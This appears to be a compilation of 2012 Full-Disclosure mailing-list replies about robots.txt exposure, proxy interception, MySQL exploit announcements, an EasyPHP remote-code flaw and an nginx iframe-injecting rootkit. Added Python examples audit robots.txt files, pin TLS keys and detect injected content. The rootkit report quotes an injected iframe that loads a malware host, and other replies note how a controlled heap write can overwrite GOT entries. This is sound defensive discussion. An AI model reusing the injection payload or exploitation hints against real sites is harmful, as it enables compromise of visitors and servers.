Jeff On Tue, Dec 11, 2012 at 2:01 PM, Scott Ferguson scott.ferguson.it.consult...@gmail.com wrote: If I understand the OP correctly, he is not stating that listing something in robots.txt would make it inaccessible, but rather that Google indexes the robots.txt files themselves, snipped Well, um, yeah - I got that. So you are what, proposing that moving an open door back a few centimetres solves the (non) problem? Take your proposal to it's logical extension and stop all search engines (especially the ones that don't respect robots.txt) from indexing robots.txt. Now what do you do about Nutch or even some perl script that anyone can whip up in 2 minutes? Security through obscurity is fine when couple with actual security - but relying on it alone is just daft. Expecting to world to change so bad habits have no consequence is dangerously naive. I suspect you're looking to hard at finding fault with Google - who are complying with the robots.txt. Read the spec. - it's about not following the listed directories, not about not listing the robots.txt. Next you'll want laws against bad weather and furniture with sharp corners. Don't put things you don't want seen to see in places that can be seen. On Mon, Dec 10, 2012 at 8:19 PM, Scott Ferguson scott.ferguson.it.consulting () gmail com wrote: /From/: Hurgel Bumpf l0rd_lunatic () yahoo com /Date/: Mon, 10 Dec 2012 19:25:39 + (GMT) Hi list, i tried to contact google, but as they didn't answer my email, i do forward this to FD. This security feature is not cleary a google vulnerability, but exposes websites informations that are not really intended to be public. Conan the bavarian Your point eludes me - Google is indexing something which is publicly available. eg.:- curl http://somesite.tld/robots.txt So it seems the solution to the question your raise is, um, nonsensical. If you don't want something exposed on your web server *don't publish references to it*. 
The solution, which should be blindingly obvious, is don't create the problem in the first place. Password sensitive directories (htpasswd) - then they don't have to be excluded from search engines (because listing the inaccessible in robots.txt is redundant). You must have missed the first day of web school.

___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
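An added example (not from any poster in the thread) that checks the two points the thread converges on: it parses a constructed robots.txt, flags Disallow values that name specific files, versions or deep paths instead of a directory prefix or wildcard, and confirms from a constructed table of HTTP status codes that each excluded area is actually access-controlled rather than merely hidden.

```python
import re

# Constructed sample robots.txt for this example (not taken from the thread).
SAMPLE_ROBOTS = """\
User-agent: *
Disallow: /admin/
Disallow: /backup/db-2012-11-07.sql
Disallow: /cgi-bin/phpmyadmin-3.4.9/
Disallow: /data/exports/2012/customers.csv
Disallow: /private/*
"""
# Constructed status codes from requesting each path with no credentials.
SAMPLE_STATUS = {"/admin/": 401, "/backup/db-2012-11-07.sql": 200,
                 "/cgi-bin/phpmyadmin-3.4.9/": 200,
                 "/data/exports/2012/customers.csv": 200, "/private/": 403}
_FILE_RE = re.compile(r"\.[A-Za-z0-9]{1,5}$")   # value ends in a file extension
_VERSION_RE = re.compile(r"\d+\.\d+")            # e.g. phpmyadmin-3.4.9

def parse_robots(text):
    """Return (user_agent, disallow_value) pairs, honouring record groups."""
    rules, agents, last_was_ua = [], [], False
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if ":" not in line:
            continue
        field, value = (s.strip() for s in line.split(":", 1))
        if field.lower() == "user-agent":
            agents = agents + [value] if last_was_ua else [value]
        elif field.lower() == "disallow" and value:
            rules.extend((a, value) for a in agents or ["*"])
        last_was_ua = field.lower() == "user-agent"
    return rules

def lint_disallow(path):
    """Ways one Disallow value discloses more than a directory prefix would."""
    reasons = []
    if _FILE_RE.search(path.rstrip("*")):
        reasons.append("names a specific file")
    if _VERSION_RE.search(path):
        reasons.append("reveals a software version")
    if len([s for s in path.strip("/*").split("/") if s]) > 2:
        reasons.append("deep path; a directory prefix or wildcard says less")
    return reasons

def audit(robots_text, status_by_path):
    """Map each excluded path to its findings; an empty list means it is fine."""
    findings = {}
    for _, path in parse_robots(robots_text):
        reasons = lint_disallow(path)
        if status_by_path.get(path.rstrip("*")) == 200:  # only robots.txt guards it
            reasons.append("served with HTTP 200: not actually access-controlled")
        findings[path] = reasons
    return findings
```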
Re: [Full-disclosure] Removing useless email addresses (on FD list)
On Tue, Dec 11, 2012 at 5:58 PM, Christian Sciberras uuf6...@gmail.com wrote:
John (Cartwright), It is quite annoying to have a volley of bounce mail from non-existent/(re)moved mailboxes. Can't we somehow limit this? I recall in other newsgroups software, several bounced (reply) emails to a periodic (monthly? bimonthly?) ping would automatically retire the email in question (perhaps after a warning or something such).

+1 Ditto for BugTraq.

Jeff
Re: [Full-disclosure] Nokia phone forcing traffic through proxy
On Fri, Dec 7, 2012 at 11:55 AM, Gaurang Pandya gaub...@yahoo.com wrote:
It has been noticed that internet browsing traffic, instead of directly hitting requested server, is being redirected to proxy servers. They get redirected to Nokia/Ovi proxy servers if Nokia browser is used, and to Opera proxy servers if Opera Mini browser is used. More detailed info at : http://gaurangkp.wordpress.com/2012/12/05/nokia-proxy/

It sounds a lot like http://click-fraud-fun.blogspot.com/. We know proxies can cause a lot of trouble in practice. For example, http://blog.cryptographyengineering.com/2012/03/how-do-interception-proxies-fail.html. Proxies and data snatching are the reason to pin certificates when using VPN and SSL/TLS if a pre-existing relationship exists (for example, you know the host and its public key). Are you talking to a Nokia/Ovi proxy, an interception proxy (perhaps enabled by Trustwave), or the host expected during an SSL/TLS negotiation? We now have a much better body of knowledge. It's too bad most browsers don't offer the features for those who are security conscious. On Android, Google went so far as to offer pinning as opt-in for sites: http://groups.google.com/group/android-security-discuss/browse_thread/thread/f5898be7ee9abc48.

Jeff
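Jeff's point about pinning when you already know the host's public key, as an added example that is not from the thread: a stdlib-only Python client that pulls the SubjectPublicKeyInfo out of the DER certificate, derives an HPKP-style sha256 pin from it, and refuses the TLS session when the presented key does not match, which is exactly what an interception proxy with its own "valid" certificate fails. The `der()` helper exists only to build a constructed test certificate; the host, port and pin values passed to `pinned_connect()` are placeholders supplied by the caller.

```python
import base64
import hashlib
import socket
import ssl

def der(tag, body):
    """Minimal DER TLV encoder, used only to build the constructed test cert."""
    n = len(body)
    if n < 128:
        return bytes([tag, n]) + body
    size = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(size)]) + size + body

def _tlv(buf, pos):
    """Decode one DER TLV header at pos; return (tag, content_start, end)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                      # long form: next n bytes hold the length
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, pos, pos + length

def extract_spki(cert_der):
    """DER bytes of SubjectPublicKeyInfo from an X.509 certificate."""
    _, tbs_pos, _ = _tlv(cert_der, 0)              # Certificate ::= SEQUENCE
    _, pos, tbs_end = _tlv(cert_der, tbs_pos)      # tbsCertificate ::= SEQUENCE
    fields = []
    while pos < tbs_end:
        tag, _, end = _tlv(cert_der, pos)
        if tag != 0xA0:                            # skip the optional [0] version
            fields.append((pos, end))
        pos = end
    # serialNumber, signature, issuer, validity, subject, subjectPublicKeyInfo
    start, end = fields[5]
    return cert_der[start:end]

def spki_pin(cert_der):
    """HPKP-style pin: 'sha256/' + base64(SHA-256 over the DER SPKI)."""
    digest = hashlib.sha256(extract_spki(cert_der)).digest()
    return "sha256/" + base64.b64encode(digest).decode("ascii")

def pin_matches(cert_der, pins):
    return spki_pin(cert_der) in set(pins)

def pinned_connect(host, port, pins, timeout=10):
    """TLS connect that keeps normal chain validation and additionally refuses
    any leaf key not in `pins`, which is what an interception proxy presents."""
    ctx = ssl.create_default_context()
    raw = socket.create_connection((host, port), timeout)
    sock = ctx.wrap_socket(raw, server_hostname=host)
    leaf = sock.getpeercert(binary_form=True)
    if not pin_matches(leaf, pins):
        sock.close()
        raise ssl.SSLError("pin mismatch for %s: presented %s" % (host, spki_pin(leaf)))
    return sock
```

Because the pin is on the key rather than the certificate, routine certificate renewal with the same key keeps working, but a key rotation will fail closed unless a backup pin is already in the list.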
Re: [Full-disclosure] MySQL 5.1/5.5 WiNDOWS REMOTE R00T (mysqljackpot)
On Fri, Dec 7, 2012 at 3:39 PM, Rajesh Malepati chitt...@gmail.com wrote:
On Thu, Dec 6, 2012 at 7:08 AM, Jeffrey Walton noloa...@gmail.com wrote:
On Mon, Dec 3, 2012 at 11:03 AM, king cope isowarez.isowarez.isowa...@googlemail.com wrote:
Yes I agree, we should discard this default remote vulnerability because it is documented.

Devil's advocate: Does a questionable design choice/feature that is documented make it any less vulnerable?

Looks like someone's sarcasm detector is broken.

Doh, I'm used to him being more serious.. Sorry about the extra chatter.

Jeff
Re: [Full-disclosure] MySQL 5.1/5.5 WiNDOWS REMOTE R00T (mysqljackpot)
On Mon, Dec 3, 2012 at 11:03 AM, king cope isowarez.isowarez.isowa...@googlemail.com wrote:
Yes I agree, we should discard this default remote vulnerability because it is documented.

Devil's advocate: Does a questionable design choice/feature that is documented make it any less vulnerable? How does a Mom and Pop shop who were told to get mySQL to support some business software mitigate this issue when it's insecure out of the box and there are no IT resources?

Jeff

2012/12/2 Sergei Golubchik s...@askmonty.org:
Thanks, Kurt!

2012/12/2 Kurt Seifried kseifr...@redhat.com:
*** FARLiGHT ELiTE HACKERS LEGACY R3L3ASE *** Attached is the MySQL Windows Remote Exploit (post-auth, udf technique) including the previously released mass scanner. The exploit is mirrored at the farlight website http://www.farlight.org.

So in the case of this issue it appears to be documented (UDF, do not run MySQL as administrator, etc.). As I understand CVE assignment rules this issue does not require a CVE, however just to be on the safe side I'm CC'ing MySQL, Oracle, MariaDB, OSS-SEC, Steven Christey, cve-assign and OSVDB to the CC so that everyone is aware of what is going on.

Just to confirm - yes, it's documented. UDF is a feature that allows running any code in the MySQL server process. FILE privilege allows creating files. So yes, sure, with the appropriate privileges and the appropriately configured server one can create a file and load it as UDF. As expected.
Re: [Full-disclosure] MySQL Local/Remote FAST Account Password Cracking
On Mon, Dec 3, 2012 at 1:13 PM, king cope isowarez.isowarez.isowa...@googlemail.com wrote:
... Since the SALT does not change (and this is the weak point) in the change_user command it is a convenient way to crack passwords. (When connecting to mysql in each connection attempt the SALT is always different and sent out by the server). ...

Somewhat relevant here: Salt has been recently shown to be a good thing: Multi-Instance Security and its Application to Password-Based Cryptography (http://eprint.iacr.org/2012/196.pdf).

Jeff
Re: [Full-disclosure] EasyPHP 12.1 - Remote code execution of any php/js on local PC
Yes, we have responsibility, but no enough time to make a new release. ... This failure will never used by real hackers because it's better to found something in Acrobat or other wildspread soft. ... So stop crying, kiddy. Conclusion: Better think twice before using a software from developers like this. There are alternatives to EasyPHP.

That sounds like a Pwnie Award nomination for the lamest vendor response. http://pwnies.com.

Jeff

On Sat, Dec 1, 2012 at 5:51 AM, auto59190...@hushmail.com wrote:
Follow-Up to http://seclists.org/fulldisclosure/2012/Nov/7

EasyPHP 12.1 - Remote code execution of any php/js on local PC

Product: EasyPHP installs a complete WAMP environment for PHP developers in Windows including PHP, Apache, MySQL, PhpMyAdmin, Xdebug... - http://www.easyphp.org/

Problem: EasyPHP also provides a php Code Tester feature: If you want to quickly test a piece of code, enter your code in the field below and click on Interpret the code. codetester.php gets the php via a form which submits it to hardcoded url http://127.0.0.1/home/codetester.php There is no nonce or any other check about the origin of the post call. The php will then be written to a file /home/codesource.php and executed. If EasyPHP 12.1 is running on your PC and you visit an evil page on some server in internet with your browser, you are pwned. [...]

Finally (sort of) an answer of the developers: Yes, we have responsibility, but no enough time to make a new release. ... This failure will never used by real hackers because it's better to found something in Acrobat or other wildspread soft. ... So stop crying, kiddy.

Conclusion: Better think twice before using a software from developers like this. There are alternatives to EasyPHP. And a hint to interested fellow researchers, there is much more failure in EasyPHP, but we stop crying, for now...
Re: [Full-disclosure] MySQL (Linux) Heap Based Overrun PoC Zeroday
On Sun, Dec 2, 2012 at 10:40 AM, king cope isowarez.isowarez.isowa...@googlemail.com wrote:
When you look into the heap and stack overrun the first obstacle to exploit the bugs is that MySQL does not allow all plain 0 to 255 characters, this means the exploiter would have to use unicode translation in order to exploit the bugs (therefore these are PoCs only by now). If the exploiter managed to execute code on default installs without your mentioned protections it might be possible to circumvent them, to be honest I didn't have a look into these optimizations and protections, it's hard enough to exploit it without these restrictions applied.

No problem, thanks. Rodrigo pointed out a RO GOT (-z,relro) meant the GOT would be safe, but other areas were still vulnerable on the heap overflow. I think I'd take a hardened GOT and make the attacker move on to the next weak area. It's really a shame that high risk applications (such as those that take input from the Internet) are still failing in these ways in 2012. There's a lot of platform security available (and other hardening techniques), but folks chose not to use them. It's disappointing the various security teams have not improved the situation (they are the folks who should know, and should take a defensive posture).

Jeff

2012/12/1 Jeffrey Walton noloa...@gmail.com:
Hi Kingcope,

    # As seen below $edx and $edi are fully controlled,
    # the current instruction is
    # = 0x83a6b24 free_root+180: mov (%edx),%edi
    # this means we landed in a place where 4 bytes can be controlled by 4 bytes
    # with this function pointers and GOT entries can be rewritten to execute arbitrary code

Out of curiosity, is this exploitable when using hardened toolchain settings? Specifically, -z,noexecheap, -z,now, and -z,relro? For no-exec heaps, you need to be on Gentoo or other platforms which offer the remediation.

Jeff

On Sat, Dec 1, 2012 at 4:26 PM, king cope isowarez.isowarez.isowa...@googlemail.com wrote:
(see attachment)
Cheerio,
Kingcope
Re: [Full-disclosure] MySQL (Linux) Stack based buffer overrun PoC Zeroday
Hi Kingcope,

MySQL Server exploitable stack based overrun Ver 5.5.19-log for Linux and below (tested with Ver 5.1.53-log for suse-linux-gnu too) unprivileged user (any account (anonymous account?), post auth) as illustrated below the instruction pointer is overwritten with 0x41414141 bug found by Kingcope this will yield a shell as the user 'mysql' when properly exploited

Out of curiosity, is this exploitable when using hardened toolchain settings? Specifically, -D_FORTIFY_SOURCES=2 and -fstack-protector-all?

Jeff

On Sat, Dec 1, 2012 at 4:26 PM, king cope isowarez.isowarez.isowa...@googlemail.com wrote:
(see attachment)
Cheerio,
Kingcope
Re: [Full-disclosure] FreeFTPD Remote Authentication Bypass Zeroday Exploit (Stuxnet technique)
On Sat, Dec 1, 2012 at 5:07 PM, Aris Adamantiadis a...@0xbadc0de.be wrote:
Hi Kcope
You're late on this one: http://seclists.org/fulldisclosure/2010/Aug/132

It seems there is a disconnect or it appears they got the analysis wrong: Your request was examined. This is nothing more than a null pointer dereference, which cannot be easily exploited.

On 1/12/12 22:26, king cope wrote:
(see attachment)
Cheerio,
Kingcope
Re: [Full-disclosure] linux rootkit in combination with nginx
On Tue, Nov 27, 2012 at 10:41 AM, Gregor S. rc4...@googlemail.com wrote:
More interesting than the rootkit itself is how it found its way into the box. Chances are that Squeeze has a non-disclosed 0day, and that's worrying me a bit...

It's based on Linux, so there are probably a lot of non-disclosed 0-days. Folks like Dan Rosenberg have made a career out of finding Comp Sci 101 bugs because some of the developers are too l33t to use tools and analysis to find their mistakes. The OS's namesake is too arrogant for his own good (cf., GCC is crap, http://linux.derkeiler.com/Mailing-Lists/Kernel/2006-11/msg08325.html).

Jeff

On Mon, Nov 26, 2012 at 11:04 AM, dxp dxp2...@gmail.com wrote:
Looks like a new rootkit according to Kaspersky [1] and some analysis released by CrowdStrike [2].
[1] https://www.securelist.com/en/blog/208193935/New_64_bit_Linux_Rootkit_Doing_iFrame_Injections
[2] http://blog.crowdstrike.com/2012/11/http-iframe-injecting-linux-rootkit.html
PS: Interesting to know if others found this on their servers or is this an isolated incident !?

On Tue, Nov 13, 2012 at 10:19 AM, stack trace stacktrac...@gmail.com wrote:
Hi there,
We've discovered something which looks to us like a rootkit working together with proxy software like nginx. Our OS is debian squeeze and nginx 1.2.3. Here is what happened: We are running a web service and we got notified by some of our customers that they are getting redirected to some malicious sites. Somehow a hacker managed to inject an iframe into our http responses. I tried to do a telnet test on our nginx proxy and saw that even the bad request response which gets served directly from nginx contained the malicious iframe code.

    server {
        listen 80 default backlog=2048;
        listen 443 default backlog=2048 ssl;
        server_name _;
        access_log off;
        (...)
        location / {
            return 400;
        }
    }

Doing a bad request nginx doesn't go to cache in this case - the return 400 makes nginx reply with a predefined response (a string in memory). Even this response contained an iframe like this:

    HTTP/1.1 400 Bad Request
    Server: nginx/1.2.3
    Date: Wed, 07 Nov 2012 00:01:24 GMT
    Content-Type: text/html
    Content-Length: 353
    Connection: close

    <html>
    <head><title>400 Bad Request</title></head>
    <body bgcolor="white"><div style=...><iframe src="http://malware-site/index.php"></iframe></div>
    <center><h1>400 Bad Request</h1></center>
    <hr><center>nginx/1.2.3</center>

We've done an strace on the running nginx process and discovered that the reply of the process actually didn't contain the malicious iframe.

    writev(3, [{"HTTP/1.1 400 Bad Request\r\nServer"..., 151}, {"<html>\r\n<head><title>400 Bad Req"..., 120}, {"<hr><center>nginx/1.2.4</center>"..., 52}], 3) = 323

After a bit deeper digging we've found some kernel rootkit I've attached to this email and also some hidden processes were running on our proxy machine with names like write_startup_c and get_http_inj_fr (which sounds like what happened to us). Is this a known attack / rootkit etc or did we discover something new?
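The comparison the poster did by hand (telnet output versus the strace of what nginx wrote), as an added example that is not the poster's code: it parses an HTTP response, checks Content-Length against the delivered body, diffs the on-wire body against the known-good body the process emitted to isolate the injected lines, and extracts any iframe sources for comparison with IoC lists. Both responses are constructed in the block in the shape of the thread's 400 page; the injected iframe sits on its own line rather than inline as in the post, and the malware-site hostname is the post's own placeholder.

```python
import difflib
import re

def _nginx_400(extra=b""):
    """Build a response in the shape of nginx's built-in 400 page (constructed)."""
    body = (b"<html>\r\n<head><title>400 Bad Request</title></head>\r\n"
            b"<body bgcolor=\"white\">\r\n" + extra +
            b"<center><h1>400 Bad Request</h1></center>\r\n"
            b"<hr><center>nginx/1.2.3</center>\r\n</body>\r\n</html>\r\n")
    head = (b"HTTP/1.1 400 Bad Request\r\nServer: nginx/1.2.3\r\n"
            b"Date: Wed, 07 Nov 2012 00:01:24 GMT\r\nContent-Type: text/html\r\n"
            b"Content-Length: %d\r\nConnection: close\r\n\r\n" % len(body))
    return head + body

# What the nginx process writes (per strace) versus what a client receives.
BASELINE = _nginx_400()
WIRE = _nginx_400(b"<iframe src=\"http://malware-site/index.php\"></iframe>\r\n")

_IFRAME_RE = re.compile(r"<iframe[^>]*\ssrc\s*=\s*[\"']?([^\"'\s>]+)", re.I)

def split_response(raw):
    """Return (status line, header dict with lower-cased names, body bytes)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body

def content_length_consistent(raw):
    """False when the declared length and the delivered body disagree."""
    _, headers, body = split_response(raw)
    return headers.get("content-length") == str(len(body))

def injected_fragments(wire_raw, baseline_raw):
    """Body lines delivered to the client that the process never wrote."""
    base = split_response(baseline_raw)[2].decode("latin-1").splitlines()
    wire = split_response(wire_raw)[2].decode("latin-1").splitlines()
    matcher = difflib.SequenceMatcher(a=base, b=wire, autojunk=False)
    return [line for op, _, _, j1, j2 in matcher.get_opcodes()
            if op in ("insert", "replace") for line in wire[j1:j2]]

def iframe_sources(raw):
    """Every iframe src in the response body, for blocklist/IoC comparison."""
    return _IFRAME_RE.findall(split_response(raw)[2].decode("latin-1"))
```

Note that the rootkit also rewrote Content-Length (353 on the wire against 172 body bytes in the strace), so the length check alone passes; the diff against a trusted baseline is the check that catches the injection.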